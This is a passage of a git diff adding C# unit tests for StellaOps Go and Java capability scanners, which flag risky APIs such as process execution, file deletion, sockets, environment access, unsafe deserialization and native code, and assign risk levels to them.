+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Remove/RemoveAll", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsRemoveAll()
+ {
+ const string code = @"os.RemoveAll(""/tmp/dir"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Remove/RemoveAll", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsChmod()
+ {
+ const string code = @"os.Chmod(""file.txt"", 0755)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Chmod/Chown", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsChown()
+ {
+ const string code = @"os.Chown(""file.txt"", 1000, 1000)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Chmod/Chown", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsSymlink()
+ {
+ const string code = @"os.Symlink(""target"", ""link"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Symlink/Link", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsMkdir()
+ {
+ const string code = @"os.Mkdir(""dir"", 0755)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.Mkdir", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsReadFile()
+ {
+ const string code = @"data, _ := os.ReadFile(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("os.ReadFile/WriteFile", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsIoutilReadFile()
+ {
+ const string code = @"data, _ := ioutil.ReadFile(""file.txt"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("ioutil", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Network Patterns
+
+ [Fact]
+ public void ScanFile_DetectsNetDial()
+ {
+ const string code = @"conn, _ := net.Dial(""tcp"", ""localhost:8080"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("net.Dial", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNetListen()
+ {
+ const string code = @"ln, _ := net.Listen(""tcp"", "":8080"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("net.Listen", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsHttpGet()
+ {
+ const string code = @"resp, _ := http.Get(""https://example.com"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("http.Get/Post", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsHttpPost()
+ {
+ const string code = @"resp, _ := http.Post(""https://example.com"", ""application/json"", body)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("http.Get/Post", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsHttpListenAndServe()
+ {
+ const string code = @"http.ListenAndServe("":8080"", nil)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("http.ListenAndServe", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNetLookupHost()
+ {
+ const string code = @"addrs, _ := net.LookupHost(""example.com"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("net.Lookup", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Environment Patterns
+
+ [Fact]
+ public void ScanFile_DetectsOsGetenv()
+ {
+ const string code = @"val := os.Getenv(""PATH"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("os.Getenv", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsLookupEnv()
+ {
+ const string code = @"val, ok := os.LookupEnv(""PATH"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("os.Getenv", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsSetenv()
+ {
+ const string code = @"os.Setenv(""MY_VAR"", ""value"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("os.Setenv", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsOsEnviron()
+ {
+ const string code = @"env := os.Environ()";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("os.Environ", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Serialization Patterns
+
+ [Fact]
+ public void ScanFile_DetectsGobDecoder()
+ {
+ const string code = @"dec := gob.NewDecoder(reader)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("gob.Decoder/Encoder", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsJsonUnmarshal()
+ {
+ const string code = @"json.Unmarshal(data, &obj)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("json", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsXmlUnmarshal()
+ {
+ const string code = @"xml.Unmarshal(data, &obj)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("xml.Unmarshal", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsYamlUnmarshal()
+ {
+ const string code = @"yaml.Unmarshal(data, &obj)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("yaml.Unmarshal", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Crypto Patterns
+
+ [Fact]
+ public void ScanFile_DetectsSha256New()
+ {
+ const string code = @"h := sha256.New()";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("crypto/hash", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsAesNewCipher()
+ {
+ const string code = @"block, _ := aes.NewCipher(key)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("crypto/cipher", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRsaGenerateKey()
+ {
+ const string code = @"key, _ := rsa.GenerateKey(rand.Reader, 2048)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("crypto/rsa", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Database Patterns
+
+ [Fact]
+ public void ScanFile_DetectsSqlOpen()
+ {
+ const string code = @"db, _ := sql.Open(""postgres"", connStr)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Database, result[0].Kind);
+ Assert.Equal("sql.Open", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Dynamic Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsReflectValueCall()
+ {
+ const string code = @"
+import ""reflect""
+v.Call(args)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("reflect.Value.Call", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsMethodByName()
+ {
+ const string code = @"m := v.MethodByName(""Execute"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.DynamicCode, result[0].Kind);
+ Assert.Equal("reflect.MethodByName", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Reflection Patterns
+
+ [Fact]
+ public void ScanFile_DetectsReflectTypeOf()
+ {
+ const string code = @"t := reflect.TypeOf(obj)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("reflect.TypeOf/ValueOf", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsReflectNew()
+ {
+ const string code = @"v := reflect.New(t)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("reflect.New", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRuntimeCaller()
+ {
+ const string code = @"_, file, line, _ := runtime.Caller(0)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Reflection, result[0].Kind);
+ Assert.Equal("runtime.Caller", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Native Code Patterns
+
+ [Fact]
+ public void ScanFile_DetectsCgoImport()
+ {
+ const string code = @"import ""C""";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Contains("C", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsUnsafePointer()
+ {
+ const string code = @"ptr := unsafe.Pointer(&x)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("unsafe.Pointer", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsGoLinknameDirective()
+ {
+ const string code = @"//go:linkname localName runtime.someInternalFunc";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("go:linkname", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsGoNoescapeDirective()
+ {
+ const string code = @"//go:noescape
+func unsafeFunc(ptr *byte)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("go:noescape", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSyscallSyscall()
+ {
+ const string code = @"r1, r2, err := syscall.Syscall(SYS_WRITE, fd, buf, count)";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.NativeCode, result[0].Kind);
+ Assert.Equal("syscall.Syscall", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Plugin Patterns
+
+ [Fact]
+ public void ScanFile_DetectsPluginOpen()
+ {
+ const string code = @"p, _ := plugin.Open(""plugin.so"")";
+ var result = GoCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.PluginLoading, result[0].Kind);
+ Assert.Equal("plugin.Open", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region GoCapabilityEvidence Tests
+
+ [Fact]
+ public void Evidence_DeduplicationKey_IsCorrect()
+ {
+ var evidence = new GoCapabilityEvidence(
+ CapabilityKind.Exec,
+ "test.go",
+ 10,
+ "exec.Command");
+
+ Assert.Equal("Exec|test.go|10|exec.Command", evidence.DeduplicationKey);
+ }
+
+ [Fact]
+ public void Evidence_ConfidenceIsClamped()
+ {
+ var evidence1 = new GoCapabilityEvidence(
+ CapabilityKind.Exec, "test.go", 1, "pattern",
+ confidence: 2.0f);
+ var evidence2 = new GoCapabilityEvidence(
+ CapabilityKind.Exec, "test.go", 1, "pattern",
+ confidence: -1.0f);
+
+ Assert.Equal(1.0f, evidence1.Confidence);
+ Assert.Equal(0.0f, evidence2.Confidence);
+ }
+
+ [Fact]
+ public void Evidence_CreateMetadata_IncludesAllFields()
+ {
+ var evidence = new GoCapabilityEvidence(
+ CapabilityKind.Exec,
+ "test.go",
+ 10,
+ "exec.Command",
+ snippet: "cmd := exec.Command(\"ls\")",
+ confidence: 0.95f,
+ risk: CapabilityRisk.Critical);
+
+ var metadata = evidence.CreateMetadata().ToDictionary(kv => kv.Key, kv => kv.Value);
+
+ Assert.Equal("exec", metadata["capability.kind"]);
+ Assert.Equal("test.go:10", metadata["capability.source"]);
+ Assert.Equal("exec.Command", metadata["capability.pattern"]);
+ Assert.Equal("critical", metadata["capability.risk"]);
+ Assert.Equal("0.95", metadata["capability.confidence"]);
+ Assert.Contains("exec.Command", metadata["capability.snippet"]);
+ }
+
+ [Fact]
+ public void Evidence_ToLanguageEvidence_ReturnsCorrectFormat()
+ {
+ var evidence = new GoCapabilityEvidence(
+ CapabilityKind.Exec,
+ "test.go",
+ 10,
+ "exec.Command");
+
+ var langEvidence = evidence.ToLanguageEvidence();
+
+ Assert.Equal(LanguageEvidenceKind.Metadata, langEvidence.Kind);
+ Assert.Equal("test.go", langEvidence.Source);
+ Assert.Equal("line:10", langEvidence.Locator);
+ Assert.Equal("Exec:exec.Command", langEvidence.Value);
+ }
+
+ #endregion
+}
diff --git a/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Java.Tests/Internal/JavaCapabilityScannerTests.cs b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Java.Tests/Internal/JavaCapabilityScannerTests.cs
new file mode 100644
index 000000000..67de4c52b
--- /dev/null
+++ b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.Java.Tests/Internal/JavaCapabilityScannerTests.cs
@@ -0,0 +1,786 @@
+using StellaOps.Scanner.Analyzers.Lang.Java.Internal.Capabilities;
+
+namespace StellaOps.Scanner.Analyzers.Lang.Java.Tests.Internal;
+
+/// <summary>
+/// Tests for <see cref="JavaCapabilityScanner"/>.
+/// </summary>
+public sealed class JavaCapabilityScannerTests
+{
+ private const string TestFile = "Test.java";
+
+ #region ScanFile - General Tests
+
+ [Fact]
+ public void ScanFile_NullContent_ReturnsEmpty()
+ {
+ var result = JavaCapabilityScanner.ScanFile(null!, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_EmptyContent_ReturnsEmpty()
+ {
+ var result = JavaCapabilityScanner.ScanFile("", TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_WhitespaceContent_ReturnsEmpty()
+ {
+ var result = JavaCapabilityScanner.ScanFile(" \n\t\n ", TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NoPatterns_ReturnsEmpty()
+ {
+ const string code = @"
+public class Test {
+ public static void main(String[] args) {
+ System.out.println(""Hello"");
+ }
+}";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NormalizesBackslashesInPath()
+ {
+ const string code = @"Runtime.getRuntime().exec(""cmd"");";
+ var result = JavaCapabilityScanner.ScanFile(code, @"C:\src\Test.java").ToList();
+
+ Assert.Single(result);
+ Assert.Equal("C:/src/Test.java", result[0].SourceFile);
+ }
+
+ #endregion
+
+ #region ScanFile - Comment Stripping
+
+ [Fact]
+ public void ScanFile_IgnoresSingleLineComments()
+ {
+ const string code = @"
+// Runtime.getRuntime().exec(""cmd"");
+public void method() { }";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_IgnoresMultiLineComments()
+ {
+ const string code = @"
+/*
+Runtime.getRuntime().exec(""cmd"");
+new ProcessBuilder(""ls"");
+*/
+public void method() { }";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_IgnoresJavadocComments()
+ {
+ const string code = @"
+/**
+ * Runtime.getRuntime().exec(""cmd"");
+ */
+public void method() { }";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Empty(result);
+ }
+
+ #endregion
+
+ #region ScanFile - Exec Patterns
+
+ [Fact]
+ public void ScanFile_DetectsRuntimeExec()
+ {
+ const string code = @"Runtime.getRuntime().exec(""ls -la"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("Runtime.exec", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ Assert.Equal(1.0f, result[0].Confidence);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewProcessBuilder()
+ {
+ const string code = @"ProcessBuilder pb = new ProcessBuilder(""ls"", ""-la"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("ProcessBuilder", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsProcessBuilderStart()
+ {
+ const string code = @"Process p = pb.start();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Exec, result[0].Kind);
+ Assert.Equal("ProcessBuilder.start", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Filesystem Patterns
+
+ [Fact]
+ public void ScanFile_DetectsFileInputStream()
+ {
+ const string code = @"InputStream is = new FileInputStream(""file.txt"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("FileInputStream", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileOutputStream()
+ {
+ const string code = @"OutputStream os = new FileOutputStream(""file.txt"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("FileOutputStream", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFilesRead()
+ {
+ const string code = @"byte[] data = Files.readAllBytes(path);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("Files.*", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileDelete()
+ {
+ const string code = @"file.delete();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File.delete", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsFileSetExecutable()
+ {
+ const string code = @"file.setExecutable(true);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("File.setExecutable", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsRandomAccessFile()
+ {
+ const string code = @"RandomAccessFile raf = new RandomAccessFile(""file.bin"", ""rw"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Filesystem, result[0].Kind);
+ Assert.Equal("RandomAccessFile", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Network Patterns
+
+ [Fact]
+ public void ScanFile_DetectsNewSocket()
+ {
+ const string code = @"Socket socket = new Socket(""localhost"", 8080);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("Socket", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsNewServerSocket()
+ {
+ const string code = @"ServerSocket ss = new ServerSocket(8080);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("ServerSocket", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsUrlOpenConnection()
+ {
+ const string code = @"HttpURLConnection conn = (HttpURLConnection) url.openConnection();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Kind == CapabilityKind.Network);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsHttpClientBuilder()
+ {
+ const string code = @"HttpClient client = HttpClient.newBuilder().build();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Network, result[0].Kind);
+ Assert.Equal("HttpClient.newBuilder", result[0].Pattern);
+ }
+
+ #endregion
+
+ #region ScanFile - Environment Patterns
+
+ [Fact]
+ public void ScanFile_DetectsSystemGetenv()
+ {
+ const string code = @"String path = System.getenv(""PATH"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("System.getenv", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Medium, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSystemGetProperty()
+ {
+ const string code = @"String home = System.getProperty(""user.home"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("System.getProperty", result[0].Pattern);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSystemSetProperty()
+ {
+ const string code = @"System.setProperty(""my.prop"", ""value"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Environment, result[0].Kind);
+ Assert.Equal("System.setProperty", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Serialization Patterns (Critical for deserialization attacks)
+
+ [Fact]
+ public void ScanFile_DetectsObjectInputStream()
+ {
+ const string code = @"ObjectInputStream ois = new ObjectInputStream(fis);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("ObjectInputStream", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsReadObject()
+ {
+ const string code = @"Object obj = ois.readObject();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("readObject", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsXMLDecoder()
+ {
+ const string code = @"XMLDecoder decoder = new XMLDecoder(new FileInputStream(""data.xml""));";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.True(result.Count >= 1);
+ Assert.Contains(result, r => r.Pattern == "XMLDecoder" && r.Risk == CapabilityRisk.Critical);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsXStream()
+ {
+ const string code = @"XStream xstream = new XStream();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("XStream", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.High, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsXStreamFromXML()
+ {
+ const string code = @"Object obj = xstream.fromXML(xml);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("XStream.fromXML", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsSnakeYamlLoad()
+ {
+ const string code = @"Object obj = yaml.load(input);";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("Yaml.load", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsJacksonEnableDefaultTyping()
+ {
+ const string code = @"mapper.enableDefaultTyping();";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Serialization, result[0].Kind);
+ Assert.Equal("Jackson defaultTyping", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Critical, result[0].Risk);
+ }
+
+ #endregion
+
+ #region ScanFile - Crypto Patterns
+
+ [Fact]
+ public void ScanFile_DetectsMessageDigest()
+ {
+ const string code = @"MessageDigest md = MessageDigest.getInstance(""SHA-256"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
+ Assert.Equal(CapabilityKind.Crypto, result[0].Kind);
+ Assert.Equal("MessageDigest", result[0].Pattern);
+ Assert.Equal(CapabilityRisk.Low, result[0].Risk);
+ }
+
+ [Fact]
+ public void ScanFile_DetectsCipher()
+ {
+ const string code = @"Cipher cipher = Cipher.getInstance(""AES/CBC/PKCS5Padding"");";
+ var result = JavaCapabilityScanner.ScanFile(code, TestFile).ToList();
+
+ Assert.Single(result);
